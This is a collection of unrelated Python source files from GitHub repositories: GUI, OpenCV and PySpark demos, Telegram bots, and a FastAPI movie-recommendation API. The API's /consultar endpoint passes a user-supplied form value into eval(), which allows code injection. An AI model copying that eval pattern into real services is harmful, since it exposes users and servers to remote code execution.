main()\n","repo_name":"kyclark/tiny_python_projects","sub_path":"template/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1267,"dataset":"github-code","pt":"51"} +{"seq_id":"71839969757","text":"from PySide6.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QVBoxLayout,\\\n QDialog, QFormLayout, QLineEdit, QDialogButtonBox, QMessageBox, QSpinBox\nfrom PySide6.QtCore import Qt\nimport sys\n\n\n# https://doc.qt.io/qtforpython/PySide6/QtWidgets/QDialog.html\nclass CustomDialog(QDialog):\n def __init__(self, parent=None, title='', name='', age=0):\n super().__init__(parent)\n\n # Resize window\n self.setMinimumWidth(300)\n self.setWindowTitle(title)\n\n # Create name text box\n self.txt_name = QLineEdit(name)\n self.txt_name.setMaxLength(20)\n\n # Create age spinbox\n self.spin_age = QSpinBox()\n self.spin_age.setMinimum(0)\n self.spin_age.setMaximum(100)\n self.spin_age.setValue(age)\n\n # Add text boxes to form layout\n self.form = QFormLayout()\n self.form.addRow('Name: ', self.txt_name)\n self.form.addRow('Age:', self.spin_age)\n\n # Create dialog Ok and Cancel buttons\n dialog_buttons = QDialogButtonBox(QDialogButtonBox.StandardButton.Ok |\n QDialogButtonBox.StandardButton.Cancel)\n dialog_buttons.accepted.connect(self.accept)\n dialog_buttons.rejected.connect(self.reject)\n\n # Add form and dialog buttons to vertical box layout\n vbox = QVBoxLayout()\n vbox.addLayout(self.form)\n vbox.addWidget(dialog_buttons)\n\n # Add vertical layout to window\n self.setLayout(vbox)\n\n def get_name(self):\n # Return text from textbox\n return self.txt_name.text()\n\n def get_age(self):\n # Return age from spinbox\n return self.spin_age.value()\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n self.custom_dialog_modeless = None\n self.name = ''\n self.age = 0\n\n # Set minimum window size\n self.setMinimumSize(150, 100)\n self.setWindowTitle('Custom dialog')\n\n self.setWindowFlags(self.windowFlags() & Qt.CustomizeWindowHint)\n self.setWindowFlags(self.windowFlags() & ~Qt.WindowMinMaxButtonsHint)\n\n # Create push buttons\n show_dialog_model = QPushButton('Model dialog', self)\n show_dialog_model.clicked.connect(self.dialog_model_show)\n show_dialog_model.setFixedWidth(130)\n show_dialog_modeless = QPushButton('Modeless dialog', self)\n show_dialog_modeless.clicked.connect(self.dialog_modeless_show)\n show_dialog_modeless.setFixedWidth(130)\n\n # Add button to window\n hbox = QHBoxLayout()\n hbox.addWidget(show_dialog_model)\n hbox.addWidget(show_dialog_modeless)\n\n # Create quit button\n dialog_buttons = QDialogButtonBox(QDialogButtonBox.StandardButton.Ok)\n dialog_buttons.button(QDialogButtonBox.StandardButton.Ok).setText('Quit')\n dialog_buttons.accepted.connect(QApplication.quit)\n\n # Add model buttons and quit button to layout\n vbox = QVBoxLayout()\n vbox.addLayout(hbox)\n vbox.addWidget(dialog_buttons)\n\n # Add layout to window\n self.setLayout(vbox)\n\n def dialog_model_show(self):\n # Create custom model dialog\n custom_dialog_model = CustomDialog(parent=self,\n title='Custom Model Dialog',\n name=self.name,\n age=self.age)\n\n # Wait until True (Ok / accepted) or False (Cancel / rejected) clicked\n if custom_dialog_model.exec():\n # Get results from dialog\n self.name = custom_dialog_model.get_name()\n self.age = custom_dialog_model.get_age()\n self.show_results(name=self.name, age=self.age)\n\n def dialog_modeless_show(self):\n # Create custom modeless dialog\n if not self.custom_dialog_modeless:\n self.custom_dialog_modeless = CustomDialog(parent=self,\n title='Custom Modeless Dialog',\n name=self.name,\n age=self.age)\n self.custom_dialog_modeless.accepted.connect(self.dialog_modeless_close)\n self.custom_dialog_modeless.rejected.connect(self.dialog_modeless_reject)\n\n # Show modeless dialog (show() returns immediately)\n self.custom_dialog_modeless.show()\n\n def dialog_modeless_close(self):\n # Get results from dialog\n self.name = self.custom_dialog_modeless.get_name()\n self.age = self.custom_dialog_modeless.get_age()\n self.show_results(name=self.name, age=self.age)\n\n # Destroy object\n self.custom_dialog_modeless = None\n\n def dialog_modeless_reject(self):\n # Destroy object\n self.custom_dialog_modeless = None\n\n def show_results(self, name, age):\n # Show results in information message box\n QMessageBox.information(self,\n 'Result',\n \"Hi {}! \\nYou are {} years old.\".format(name, age),\n QMessageBox.StandardButton.Ok)\n\n\ndef main():\n app = QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Erriez/pyside6-getting-started","sub_path":"06_dialogs/05_custom_dialog.py","file_name":"05_custom_dialog.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"70433619038","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler\nfrom gtts import gTTS\nimport os\n\n\nlanguage = 'en'\ndef tts(update: Update, context: CallbackContext) -> None:\n context.bot.send_chat_action(update.effective_chat.id, \"record_audio\")\n tts = update.message.text.replace(update.message.text.split(' ')[0], '')\n myobj = gTTS(text=tts, lang=language, slow=False)\n file_id = str(update.message.from_user.id) + '.mp3'\n myobj.save(file_id)\n context.bot.sendAudio(chat_id=update.message.chat.id, audio=open(file_id, 'rb'), title='Vippy TTS')\n os.remove(file_id)\n\n__handlers__ = [\n [\n CommandHandler(\n \"tts\",\n tts\n )\n ]\n]\n","repo_name":"ArmTimDev/Vippy","sub_path":"handlers/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"12685933709","text":"import json\nfrom os.path import exists, join\nfrom urllib.request import urlopen\nimport time\n\n\ndownload_folder = 'zips'\n\nwith open('json_data.json') as json_file:\n mapping = json.load(json_file)\n for book in mapping:\n if exists(join(download_folder, book)):\n print(f\"{book} already downloaded.\")\n else:\n print(f\"{book} missing, downloading.\")\n data = mapping[book]\n work = data['url'].replace('http://runeberg.org/','').strip('/')\n with urlopen( f\"http://runeberg.org/download.pl?mode=txtzip&work={work}\" ) as webpage:\n content = webpage.read()\n\n with open( join(download_folder,book), 'wb' ) as download:\n download.write( content )\n time.sleep(10)","repo_name":"moonhouse/vad","sub_path":"download_zips.py","file_name":"download_zips.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4118272833","text":"import numpy as np\nimport cv2 as cv\n\n'''\n开闭操作\n闭操作\n代码层面知识\n开操作\n\n图形形态学的重要操作之一, 基于膨胀与腐蚀操作组合形成的.\n主要是应用在二值图像分析中, 灰度图像亦可\n开操作=腐蚀+膨胀, 输入图像 + 结构元素.\n\n闭操作\n图像形态学的重要操作之一, 基于膨胀与腐蚀操作组合形成的\n主要是应用在二值图形分析中, 灰度图像亦可\n闭操作 = 膨胀加腐蚀, 输入图像 + 结构元素\n\n结构元素的选择, 和大小的调整\n\n'''\n\ndef open_demo(image):\n print(image.shape)\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n ret, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)\n cv.imshow('binary1 demo', binary)\n\n kernel = cv.getStructuringElement(cv.MORPH_RECT, (15, 1))\n binary = cv.morphologyEx(binary, cv.MORPH_OPEN, kernel)\n cv.imshow('opne results', binary)\n\ndef close_demo(image):\n print(image.shape)\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n ret, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)\n cv.imshow('binary2 demo', binary)\n\n kernel = cv.getStructuringElement(cv.MORPH_RECT, (1, 15))\n binary = cv.morphologyEx(binary, cv.MORPH_CLOSE, kernel)\n cv.imshow('close results', binary)\n\n\nprint('----------Hello Python----------')\nsrc = cv.imread('./figure/morph01.png')\ncv.namedWindow('input image', cv.WINDOW_AUTOSIZE)\ncv.imshow('input image', src)\n\nopen_demo(src)\n\n#close_demo(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n","repo_name":"xm0629/python3-opencv","sub_path":"26-开闭操作.py","file_name":"26-开闭操作.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"3923890744","text":"import sys\nimport json\nfrom common.kafka_pipeline import KafkaPipeline\nfrom applications.basic_analytics.stb_analytics.top_processes.stb_processor import StbProcessor\nfrom util.utils import Utils\nfrom pyspark.sql.functions import col, collect_list, udf, split, explode, struct\nfrom pyspark.sql.types import ArrayType, StringType, DoubleType, BooleanType, StructField, StructType\n\nclass TopProcesses(StbProcessor):\n \"\"\"\n https://www.wikitechy.com/tutorials/linux/how-to-calculate-the-cpu-usage-of-a-process-by-pid-in-Linux-from-c\n \"\"\"\n\n def __init__(self, configuration, schema):\n\n self.__configuration = configuration\n self._schema = schema\n self._component_name = configuration.property(\"analytics.componentName\")\n self.kafka_output = configuration.property(\"kafka.topics.output\")\n\n def _calculate_mem_usage(self, stream):\n \"\"\"\n\n :param stream:\n :return:\n \"\"\"\n def udf_mem_usage(row):\n MemoryUsage_totalKb = row[7]\n proc_rss = row[10]\n\n proc_mem_usage = round((float(proc_rss) / float(MemoryUsage_totalKb)) * 1000000) / 10000.0\n\n return proc_mem_usage\n\n add_mem_usage = udf(lambda row: udf_mem_usage(row), DoubleType())\n mem_usage = stream \\\n .withColumn(\"proc_mem_usage\", add_mem_usage(struct([stream[x] for x in stream.columns]))) \\\n .drop('MemoryUsage_freeKb') \\\n .withColumn(\"proc_rss\", col(\"proc_rss\").cast(DoubleType())) \\\n .withColumn(\"proc_utime\", col(\"proc_utime\").cast(DoubleType())) \\\n .withColumn(\"proc_stime\", col(\"proc_stime\").cast(DoubleType()))\n\n return mem_usage\n\n def _seperate_procs(self, stream):\n \"\"\"\n Seperate top_procs field into each process.\n :param stream:\n :return:\n \"\"\"\n def udf_split_procs(text):\n arr = text.replace('},{', '}|{').split('|')\n req_fields = ['ts', 'name', 'rss', 'utime', 'stime']\n res = []\n for elem in arr:\n proc = json.loads(elem)\n row = []\n for key in req_fields:\n row.append(proc[key])\n res.append(row)\n return res\n\n split_proc = udf(lambda row: udf_split_procs(row), ArrayType(ArrayType(StringType())))\n flatten = stream \\\n .withColumn(\"TopProcesses_processes\", split_proc(col('TopProcesses_processes'))) \\\n .withColumn('TopProcesses_processes', explode('TopProcesses_processes')) \\\n .withColumn('proc_ts', col('TopProcesses_processes').getItem(0)) \\\n .withColumn('proc_name', col('TopProcesses_processes').getItem(1)) \\\n .withColumn('proc_rss', col('TopProcesses_processes').getItem(2)) \\\n .withColumn('proc_utime', col('TopProcesses_processes').getItem(3)) \\\n .withColumn('proc_stime', col('TopProcesses_processes').getItem(4)) \\\n .drop('TopProcesses_processes')\n\n mem_usage = self._calculate_mem_usage(flatten)\n return mem_usage\n\n def _process_pipeline(self, stream):\n \"\"\"\n Pipeline method\n :param json_stream: kafka stream reader\n :return: list of streams\n \"\"\"\n filter_udf = udf(TopProcesses.udf_filter, BooleanType())\n processed = stream \\\n .groupBy('originId') \\\n .agg(collect_list('timestamp'), collect_list('MemoryUsage_freeKb'), collect_list('MemoryUsage_totalKb'),\n collect_list('TopProcesses_processes'), collect_list('hardwareVersion'), collect_list('modelDescription'),\n collect_list('firmwareVersion'), collect_list('appVersion')) \\\n .filter(filter_udf(col('collect_list(TopProcesses_processes)')))\n\n filled = self._fill_df(processed)\n proc_split = self._seperate_procs(filled)\n return [proc_split]\n\n @staticmethod\n def get_message_schema():\n return StructType([\n StructField(\"timestamp\", StringType()),\n StructField(\"originId\", StringType()),\n StructField(\"MemoryUsage_freeKb\", StringType()),\n StructField(\"MemoryUsage_totalKb\", StringType()),\n StructField(\"TopProcesses_processes\", StringType()),\n StructField(\"hardwareVersion\", StringType()),\n StructField(\"modelDescription\", StringType()),\n StructField(\"firmwareVersion\", StringType()),\n StructField(\"appVersion\", StringType())\n ])\n\ndef create_processor(configuration):\n return TopProcesses(configuration, TopProcesses.get_message_schema())\n\n\nif __name__ == \"__main__\":\n configuration = Utils.load_config(sys.argv[:])\n KafkaPipeline(\n configuration,\n create_processor(configuration)\n ).start()\n","repo_name":"MichalKus/odh-python-pipelines","sub_path":"src/applications/basic_analytics/stb_analytics/top_processes/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22073393372","text":"\"\"\"外星飞船碰撞飞船时,需要执行跟多任务,\n1 删除剩余的外星飞船与子弹\n2 让飞船重新居中\n3 创建一批新的外星飞船\n\"\"\"\nclass GameStats:\n #用于记录飞船被碰撞次数\n def __init__(self,ai_game):\n self.settings = ai_game.settings\n self.reset_stats() #用于初始化大部分统计信息\n self.game_active = False # 游戏运行的标志\n self.high_score = 0 # 初始最高分数\n def reset_stats(self):\n #初始化在游戏期间可能变化的统计信息\n self.ship_left = self.settings.ship_limit # 统计飞船数量\n self.score = 0 #用于计分\n self.level = 1 #设置最初玩家等级\n\n","repo_name":"xiao205/Battle_of-_Ships","sub_path":"bit_ship/game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40317293600","text":"import pandas as pd\n#Script propio de ML\nfrom ml_models import matriz_similitud, obtener_recomendaciones\n# Librerias necesarias para la portada y la API\nfrom fastapi import FastAPI, Form, Request\nfrom enum import Enum\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n#DATA GENERAL DE LA API\napp = FastAPI()\napp.title = \"Movies API - ML MoviesRecommenderSystem\"\napp.version = \"1.0.0\"\n\n#Necesario para los logos\nfrom fastapi.staticfiles import StaticFiles\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n# INTERFAZ INICIAL, PORTADA CON CASOS DE EJEMPLOS\n@app.get(\"/\", response_class=HTMLResponse)\nasync def mostrar_portada(request: Request):\n funciones = [\n {\"nombre\": \"PELICULAS POR MES\", \"parametro_predeterminado\": \"enero\"},\n {\"nombre\": \"PELICULAS POR DIA\", \"parametro_predeterminado\": \"lunes\"},\n {\"nombre\": \"POPULARIDAD DEL TITULO\", \"parametro_predeterminado\": \"Toy Story\"},\n {\"nombre\": \"VOTOS DEL TITULO\", \"parametro_predeterminado\": \"Jumanji\"},\n {\"nombre\": \"INFORMACION DE ACTOR\", \"parametro_predeterminado\": \"Tom Hanks\"},\n {\"nombre\": \"INFORMACION DE DIRECTOR\", \"parametro_predeterminado\": \"John Lasseter\"},\n {\"nombre\": \"SISTEMA DE RECOMENDACION\", \"parametro_predeterminado\": \"Jumanji\"},\n ]\n return templates.TemplateResponse(\"index.html\", {\"funciones\": funciones, \"request\": request})\n\ndicFunc = {\"PELICULAS POR MES\": \"cantidad_filmaciones_mes\",\n \"PELICULAS POR DIA\": \"cantidad_filmaciones_dia\",\n \"POPULARIDAD DEL TITULO\": \"score_titulo\",\n \"VOTOS DEL TITULO\":\"votos_titulo\",\n \"INFORMACION DE ACTOR\":\"get_actor\",\n \"INFORMACION DE DIRECTOR\":\"get_director\",\n \"SISTEMA DE RECOMENDACION\":\"get_recomendacion\"}\n\n@app.post(\"/consultar\")\nasync def consultar(request: Request, funcion: str = Form(...), parametro: str = Form(...)):\n funcion = dicFunc[funcion]\n if funcion in dicFunc.values():\n try:\n parametro = parametro.lower()\n resultado = await eval(f\"{funcion}('{parametro}')\")\n return resultado\n except Exception as e:\n return {\"Error\": str(e), \"Type\": \"Entrada incorrecta o desconocida, vea /docs para mas detalles\"}\n else:\n return {\"error\": \"Función no válida\"}\n\n#INICIO DE LA API\n@app.on_event(\"startup\")\nasync def startup_event():\n # CARGANDO LOS ARCHIVOS NECESARIOS PARA LOS ENDPOINTS\n global df\n global df2\n global df3\n df = pd.read_csv('data/cleanMovies.csv', parse_dates = ['release_date'])\n df2 = pd.read_csv('data/cleanCredits.csv')\n df3 = pd.merge(df, df2, on='id', how='inner')\n # Casteo de datos a tipo lista para posterior manipulacion\n df3['cast'] = df3['cast'].apply(lambda x: eval(x) if pd.notnull(x) else list([]))\n df3['director'] = df3['director'].apply(lambda x: eval(x) if pd.notnull(x) else list([]))\n\n #ENTRADA REDUCIDA PARA EL SISTEMA DE ML\n global entrada_ml\n entrada_ml = df[0:5000][['title', 'genres', 'overview']]\n entrada_ml.reset_index\n global similitudes\n similitudes = matriz_similitud(entrada_ml)\n\n#Endpoint 1\nclass Mes(str, Enum):\n enero = \"enero\"\n febero = \"febrero\"\n marzo = \"marzo\"\n abril = \"abril\"\n mayo = \"mayo\"\n junio = \"junio\"\n julio = \"julio\"\n agosto = \"agosto\"\n septiembre = \"septiembre\"\n octubre = \"octubre\"\n noviembre = \"noviembre\"\n diciembre = \"diciembre\"\n\nmeses = {\n \"enero\": 1,\n \"febrero\": 2,\n \"marzo\": 3,\n \"abril\": 4,\n \"mayo\": 5,\n \"junio\": 6,\n \"julio\": 7,\n \"agosto\": 8,\n \"septiembre\": 9,\n \"octubre\": 10,\n \"noviembre\": 11,\n \"diciembre\": 12\n}\n\n@app.get(\"/peliculas/get_month/{mes}\", tags=['Peliculas'])\nasync def cantidad_filmaciones_mes( mes: Mes ):\n \"\"\"\n Cantidad de filmaciones estrenadas el mes indicado.\n\n Esta función recibe un mes en idioma español y retorna el número de peliculas estrenadas dicho mes sin importar cual es el año.\n\n Parametros\n ----------\n mes : str\n\n mes en idioma español enero,febrero,marzo,...\n\n Retorno\n -------\n JSON:\n\n {\"mes\":mes, \"peliculas\": int(salida) }\n \n Ejemplo\n --------\n >>> cantidad_filmaciones_mes(febrero)\n\n { \"mes\": \"enero\", \"peliculas\": 5909 }\n \"\"\"\n mesNum = meses[mes]\n salida = df[df['release_date'].dt.month == mesNum].release_date.count()\n return {\"mes\":mes, \"peliculas\": int(salida) }\n\n#Endpoint 2\nclass Dia(str, Enum):\n lunes = 'lunes'\n martes = 'martes'\n miercoles = 'miércoles'\n jueves = 'jueves'\n viernes = 'viernes'\n sabado = 'sábado'\n domingo = 'domingo'\n\ndias = {\n 'lunes': 'Monday',\n 'martes': 'Tuesday',\n 'miércoles': 'Wednesday',\n 'jueves': 'Thursday',\n 'viernes': 'Friday',\n 'sábado': 'Saturday',\n 'domingo': 'Sunday'\n}\n\n@app.get(\"/peliculas/get_day/{dia}\", tags=['Peliculas'])\nasync def cantidad_filmaciones_dia( dia: Dia ):\n \"\"\"\n Cantidad de filmaciones estrenadas el dia indicado, incluyendo todos los meses.\n\n Esta función recibe un dia en idioma español y retorna el número de peliculas estrenadas dicho día sin importar cual es el mes o año.\n\n Parametros\n ----------\n dia : str\n\n dia en idioma español lunes, martes, miércoles, jueves, viernes, sábado, domingo\n\n Retorno\n -------\n JSON\n\n {\"dia\":dia, \"peliculas\": int(salida) }\n\n Ejemplo\n --------\n >>> cantidad_filmaciones_dia(lunes)\n { \"dia\": \"lunes\", \"peliculas\": 3500 }\n \"\"\"\n df['dia'] = df['release_date'].apply(lambda x: x.strftime('%A'))\n salida = df[df['dia'] == dias[dia]].dia.count()\n \n return {\"dia\":dia, \"peliculas\": int(salida) }\n\n#Endpoint 3\n@app.get(\"/pelicula/get_popularidad/{titulo}\", tags=['Pelicula'])\nasync def score_titulo( titulo: str ):\n \"\"\"\n Score asociada a la pelicula con el titulo indicado.\n\n Esta función recibe un título de pelicula en idioma ingles y retorna título, el año de estreno y el score asociado redondeado a 2 decimales.\n\n Parametros\n ----------\n titulo : str\n\n titulo en idioma ingles\n\n Retorno\n -------\n JSON:\n\n {'titulo':titulo, 'año_lanzamiento': release_year, 'popularidad':popularity}\n\n Ejemplos\n --------\n >>> score_titulo('Father of the Bride Part II') {caso de exito} \\t\n >>> {'titulo':'Father of the Bride Part II', 'año lanzamiento': 1995, 'popularidad':8.39}\n\n >>> score_titulo('Father of theBride') {contexto de error o no existencia} \\t\n >>> {'titulo': Father of theBride, 'mensaje': 'Titulo no encontrado'}\n\n \"\"\"\n titulo = titulo.title()\n coincidencias = df[df['title'] == titulo] \n\n if not(coincidencias.empty):\n salida_df = coincidencias[['title', 'release_year', 'popularity']].iloc[0]\n salida_json = {'titulo':titulo, 'año_lanzamiento': int( salida_df['release_year']), 'popularidad': round(salida_df['popularity'], 2) } \n else:\n salida_json = {'titulo': titulo, 'mensaje': 'Titulo no encontrado'}\n\n return salida_json\n\n#Endpoint 4\n@app.get(\"/pelicula/get_votos/{titulo}\", tags=['Pelicula'])\nasync def votos_titulo( titulo: str ):\n \"\"\"\n Cantiad de votos y valor promedio de las votaciones asociada a la pelicula con el titulo indicado, en caso de que tenga al menos 2000 valoraciones.\n Caso contrario, no se devuelve ningun valor.\n\n Esta función recibe un título de pelicula en idioma ingles y retorna título, el año de estreno, la cantidad de votaciones y el valor promedio de las votaciones.\n\n Parametros\n ----------\n titulo : str\n\n titulo en idioma ingles\n\n Retorno\n -------\n registro:\n\n {'titulo':titulo, 'año_lanzamiento': release_year, 'conteo_votos': vote_count, 'votos_promedio':vote_average }\n Ejemplo\n --------\n >>> votor_titulo('Jumanji') {caso de exito} \\t\n >>> {'titulo':'Jumanji', 'año_lanzamiento:': 1995, 'conteo_votos': 2413, 'votos_promedio':6.9 } \n\n >>> votor_titulo('Father of the Bride Part II') {contexto de no existencia o de votos insuficientes} \\t\n >>> {'titulo': titulo, 'mensaje': 'No existe en el DataSet actual' }\n >>> {'titulo': titulo, 'mensaje': 'No supera los 2000 votos minimos' }\n \"\"\"\n titulo = titulo.title()\n\n coincidencias = df[df['title'] == titulo]\n\n if not(coincidencias.empty):\n salida_df = coincidencias[['title', 'release_year', 'vote_count', 'vote_average']].iloc[0] #Me quedo con la primer aparicion\n if salida_df['vote_count'] >= 2000:\n salida_json = {'titulo':titulo, 'año_lanzamiento': int( salida_df['release_year']), 'conteo_votos': int(salida_df['vote_count']), 'votos_promedio':round(salida_df['vote_average'], 2) } \n else:\n salida_json = {'titulo': titulo, 'mensaje': 'No supera los 2000 votos minimos' }\n else:\n salida_json = {'titulo': titulo, 'mensaje': 'No existe en el DataSet actual' }\n\n return salida_json\n\n#Endpoint 5\n@app.get(\"/actor/get_actor/{actor}\", tags=['Actores'])\nasync def get_actor( actor: str ):\n \"\"\"\n Éxito del acotor indicado medido a través del retorno. Cantidad de películas que en las que ha participado y el promedio de retorno.\n\n Esta función recibe el nombre completo de un actor y devuelve la cantidad de peliculas en las que ha participado, el retorno total y el promedio de retorno.\n\n Parametros\n ----------\n nombreActor : str\n\n Nombre completo del actor.\n\n Retorno\n -------\n JSON\n\n {'actor':'Actor', 'cantidad': cantidad peliculas, 'retorno_promedio': round(avg(retorno), 2) , 'retorno_total': round(sum(retorno), 2)}\n\n Ejemplo\n --------\n >>> get_actor('Tom Hanks') {caso de exito} \\t \n >>> {'actor':'Tom Hanks', 'cantidad_peliculas': 71 , 'retorno_promedio': 2.52,'retorno_total': 3.96}\n\n >>> get_actor('Pepe El grillo') {caso error o sin existencia} \\t\n >>> {'actor':'Pepe El grillo', 'mensaje': 'Actor no encontrado'}\n \"\"\" \n actor = actor.title()\n indices = []\n for index, movie in df3.iterrows():\n if actor in movie['cast']:\n indices.append(index)\n\n if len(indices) == 0:\n salida_json = {'actor':actor, 'mensaje': 'Actor no encontrado'}\n else:\n coincidencias = df3.iloc[indices]\n retorno_promedio = coincidencias['return'].mean()\n retorno_total = coincidencias['return'].sum() # Asi se pidio en las consultas el retorno total\n #retorno_total = coincidencias['revenue'].sum() / coincidencias['budget'].sum()\n salida_json = {'actor':actor, 'cantidad_peliculas': len(indices), 'retorno_promedio': round(retorno_promedio, 2), 'retorno_total':round(retorno_total, 2)}\n return salida_json \n\n#Endpoint 6\n@app.get(\"/director/get_director/{director}\", tags=['Directores'])\nasync def get_director(director: str):\n \"\"\"\n Éxito del director indicado medido a través del retorno. Peliculas dirigidas con fecha, costo y ganancia individual.\n\n Esta función recibe el nombre completo de un director y devuelve las peliculas dirigidas con fecha, costo y ganancia individual.\n\n Parametros\n ----------\n director : str\n\n nombre completo del director\n\n\n Retorno\n ----------\n JSON\n\n { 'director':'director', 'retorno': round(retorno, 2), 'peliculas': [{pelicula1}, {pelicula2} ....]}.\n\n Ejemplo\n --------\n >>> get_director('John Lasseter') {caso de exito} \\t\n >>> { \"director\": \"John Lasseter\", \"retorno\": 4.03,\n \"peliculas\": [ { \"titulo\": \"Toy Story\", \"año_lanzamiento\": \"1995-10-30\", \"presupuesto\": 30000000, \"ganancia\": 373554033 },\n { \"titulo\": \"A Bug'S Life\", \"año_lanzamiento\": \"1998-11-25\", \"presupuesto\": 120000000, \"ganancia\": 363258859 }, ...]\n\n >>> get_director('Pepe el grillo') {caso de inexistencia} \\t\n >>> { 'director':'Pepe el grillo', 'mensaje': 'Director no encontrado'}\n \"\"\"\n director = director.title()\n indices = []\n for index, movie in df3.iterrows():\n if director in movie['director']:\n indices.append(index)\n\n if len(indices) > 0:\n peliculas = df3.iloc[indices][['title', 'release_date', 'budget', 'revenue', 'return']]\n retorno_total = peliculas['return'].sum() # --> Así se pidió en las consultas\n #retorno_total = peliculas['revenue'].sum() / peliculas['budget'].sum() \n titulos = peliculas['title'].to_list()\n fechas_estreno = peliculas['release_date'].dt.date.to_list()\n presupuesto = peliculas['budget'].to_list()\n ganancia = peliculas['revenue'].to_list()\n \n #SALIDA EN VERSION LISTAS\n #salida = { 'director':director, 'return': round(retorno_total, 2), 'titles': titulos, 'release_dates': fechas_estreno, 'budgets': presupuesto, 'revenues':ganancia}\n pelis_json = [{'titulo': e1, 'año_lanzamiento': e2, 'presupuesto': e3, 'ganancia': e4} for e1, e2, e3,e4 in zip(titulos, fechas_estreno, presupuesto, ganancia)]\n \n salida = { 'director':director, 'retorno': round(retorno_total, 2), 'peliculas': pelis_json}\n else:\n salida = { 'director':director, 'mensaje': 'Director no encotrado'}\n return salida\n\n#Sistema de recomendacion\n@app.get(\"/recomendacion/get_recomendacion/{titulo}\", tags=['Sistema de Recomendacion'])\nasync def get_recomendacion(titulo: str):\n \"\"\" \n Recomendación de las 5 peliculas más similares al titulo ingresado.\n Se recibe el titulo de una pelicula en idioma ingles y se devuelve una lista ded nombres de las 5 peliculas más similares recomendada por el sistema.\n\n Parametros\n ----------\n titulo : str\n\n Titulo en ingles de la pelicula.\n\n Retorno\n -------\n JSON\n\n { 'titles':['pelicula1', 'pelicula2', 'pelicula3', 'pelicula4' , 'pelicula5' ] }.\n\n Ejemplo\n --------\n >>> get_recomendacion('Jumanji') {caso de exito} \\t\n >>> {\"titulo\":\"Jumanji\",\"titulos_recomendados\":[\"Existenz\",\"Dungeons & Dragons\",\"Any Given Sunday\",\"Manhunter\",\"A Monkey'S Tale\"]}\n\n >>> get_director('Pepe el grillo') {caso de inexistencia} \\t\n >>> {'title': 'Pepe El Grillo', 'mensaje': 'Titulo no encontrado'}\n \n \"\"\"\n \n titulo = titulo.title()\n coincidencias = entrada_ml[entrada_ml['title'] == titulo]\n if coincidencias.empty:\n salida = {'title': titulo, 'mensaje': 'Titulo no encontrado'}\n else:\n indice = coincidencias.index[0]\n\n recomendadas = obtener_recomendaciones(df = entrada_ml, matriz_sim = similitudes, indice_pelicula = indice,top_n = 5).tolist()\n\n salida = {'titulo': titulo, 'titulos_recomendados': recomendadas}\n return salida","repo_name":"ramirou2/ML_MovieRecomenderSystem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14632,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"9901242901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\n'''\n@Author: Xinshuo Gu \n@Date: 2018-02-22 18:00:24 \n@Last Modified by: Xinshuo Gu \n@Last Modified time: 2018-02-24 11:41:19 \n'''\n\n'''\nHere is the main function to dispatch all commands\nin Telegram\n'''\n\nfrom telegram.ext import Updater,CommandHandler\nimport telegram_cmd\nimport importlib\n\ndef main():\n # get the login token from bot father\n login_module = importlib.import_module('login_token')\n login_token = login_module.login_token\n \n updater = Updater(token =login_token)\n dispatcher = updater.dispatcher\n\n\n start_handler = CommandHandler('start',telegram_cmd.start)\n dispatcher.add_handler(start_handler)\n\n\n onplan_storing = CommandHandler('storing',telegram_cmd.storing)\n dispatcher.add_handler(onplan_storing)\n\n\n plan_storing = CommandHandler('planwork',telegram_cmd.planstoring)\n dispatcher.add_handler(plan_storing)\n\n\n print('Begin to run the server...')\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"cricketku/NS-Telegram","sub_path":"telegram_main.py","file_name":"telegram_main.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74781333277","text":"import re\nfrom collections import defaultdict, namedtuple\nfrom enum import IntEnum, IntFlag\nfrom functools import cache\nfrom typing import Optional\n\nimport brownie\nimport eth_abi\nimport eth_abi.packed\nfrom brownie.convert.utils import get_type_strings\nfrom brownie.network.contract import OverloadedMethod\nfrom hexbytes import HexBytes\n\nMAX_UINT256 = 2**256-1\n\n# TODO: real types?\nValue = namedtuple(\"Value\", \"param\")\nLiteralValue = namedtuple(\"LiteralValue\", \"param,value\")\nReturnValue = namedtuple(\"ReturnValue\", \"param,command\")\n\n\ndef simple_type_strings(inputs) -> tuple[Optional[list[str]], Optional[list[int]]]:\n \"\"\"cut state variables that are too long into 32 byte chunks.\n\n related: 